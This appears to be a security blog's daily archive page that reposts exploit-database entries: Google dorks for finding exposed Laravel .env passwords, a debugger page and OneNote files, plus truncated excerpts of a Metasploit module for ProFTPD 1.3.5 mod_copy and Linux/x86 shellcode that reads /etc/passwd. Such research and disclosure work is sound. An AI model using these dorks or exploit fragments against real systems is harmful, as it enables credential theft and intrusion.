Daily Archives: June 23, 2015

White Paper: Developing MIPS Exploits to Hack Routers

Title: Developing MIPS Exploits to Hack Routers
Author: Onur Alanbel

By |June 23rd, 2015|White Papers|

White Paper: Privilege Escalation via Client Management Software

Title: Privilege Escalation via Client Management Software

Author: SySS GmbH

By |June 23rd, 2015|White Papers|

GHDB – intext:DB_PASSWORD ext:env

Google dork Description: intext:DB_PASSWORD ext:env

Google search: intext:DB_PASSWORD ext:env

Submitted: 2015-05-29

This dork finds env files, usually used in Laravel configuration,
containing passwords and other juicy information.

Author: Augusto Pereira

By |June 23rd, 2015|Files containing passwords|

GHDB – inurl:/dbg-wizard.php

Google dork Description: inurl:/dbg-wizard.php

Google search: inurl:/dbg-wizard.php

Submitted: 2015-06-03

# Exploit Title: Nusphere PHP DBG wizard
# Date: 02-06-2015
# Vendor Homepage: http://www.nusphere.com
# Software Link: http://www.nusphere.com/products/dbg_wizard_download.htm
# Version: any
# Exploit Author: Alfred Armstrong
# Contact: http://twitter.com/alfaguru
# Website: http://figure-w.co.uk

DBG Wizard is meant to be used with the DBG PHP debugger as an aid to
configuring it correctly. It is supplied as a PHP script […]

By |June 23rd, 2015|Files containing juicy info|

GHDB – intitle:"index of" "onetoc2" "one"

Google dork Description: intitle:"index of" "onetoc2" "one"

Google search: intitle:"index of" "onetoc2" "one"

Submitted: 2015-06-04

# Exploit Title: intitle:"index of" "onetoc2" "one"
# Google Dork: intitle:"index of" "onetoc2" "one"
# Date: 04/06/2015
# Exploit Author: Sphearis
# Vendor Homepage: NA
# Software Link: NA
# Version: NA
# Tested on: ALL
# CVE : NA

This dork allows you to see OneNote files stored in the open (*.one). […]

By |June 23rd, 2015|Sensitive Directories|

Exploit: ProFTPD 1.3.5 Mod_Copy Command Execution

Advanced Ethical Hacking Institute in Pune
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProFTPD 1.3.5 Mod_Copy Command Execution',
      'Description'    => %q{
          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
          Any unauthenticated client can leverage these commands to copy files from any
          part of the […]

By |June 23rd, 2015|Exploits|

Shellcode: Linux/x86 – /etc/passwd Reader (58 bytes)

Linux/x86 – /etc/passwd Reader – 58 bytes

#Greetz : Bomberman(Leader),wiremask.eu
#Author : B3mB4m

#Info
#File descriptor on EBX
#Buffer on ECX
#Bytes to read on EDX

Disassembly of section .text:

08048060 <.text>:
 8048060:    31 c9                    xor    %ecx,%ecx
 8048062:    31 c0                    xor    %eax,%eax
 8048064:    31 d2                    xor    %edx,%edx
 8048066:    51                       push   %ecx
 8048067:    b0 05                    mov    $0x5,%al
 8048069:    68 73 73 77 64           push   $0x64777373
 804806e:    68 […]

By |June 23rd, 2015|Exploits|